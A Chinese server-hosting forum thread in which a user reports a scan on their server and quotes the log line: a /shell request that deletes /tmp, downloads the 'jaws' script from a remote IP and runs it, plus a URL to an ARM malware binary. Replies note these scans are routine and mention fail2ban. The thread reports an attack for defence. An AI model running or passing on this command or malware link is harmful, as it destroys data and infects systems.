设为首页收藏本站
切换到宽版

全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

全球主机交流论坛»论坛 主机综合交流 美国VPS综合讨论 有人扫我服务器 发现了个恶意脚本地址
CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
返回列表 发新帖
查看: 966|回复: 2

有人扫我服务器 发现了个恶意脚本地址

[复制链接]
chinni
发表于 2022-4-1 14:17:10 | 显示全部楼层 |阅读模式
本帖最后由 chinni 于 2022-4-1 14:20 编辑

这是他的 请求
  1. haproxy[395]: source=62.8.81.57:51286 backend-name=fe_hsts method= path= other="GET /shell?cd+/tmp;rm+-rf+*;wget+110.45.146.209/jaws;sh+/tmp/jaws HTTP/1.1"
复制代码


看了下 110.45.146.209/jaws 感觉全平台制霸了啊 这个木马 有大佬 来 玩么

这是恶意脚本.

http://110.45.146.209/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm

还有 mips 这种 不得了 啊

回复

举报

henrry
发表于 2022-4-1 14:37:49 来自手机 | 显示全部楼层
这种经常见,每次还换着不同的脚本地址来尝试。我这边只要开着80端口就天天被这种扫,fail2ban的名单列表长到快要显示不出来了
回复 支持 反对

举报

YorkZhao
发表于 2022-4-1 14:40:46 | 显示全部楼层
https://ipinfo.io/110.45.146.209
https://ipinfo.io/62.8.81.57
回复 支持 反对

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-4-25 18:20 , Processed in 0.057867 second(s), 8 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表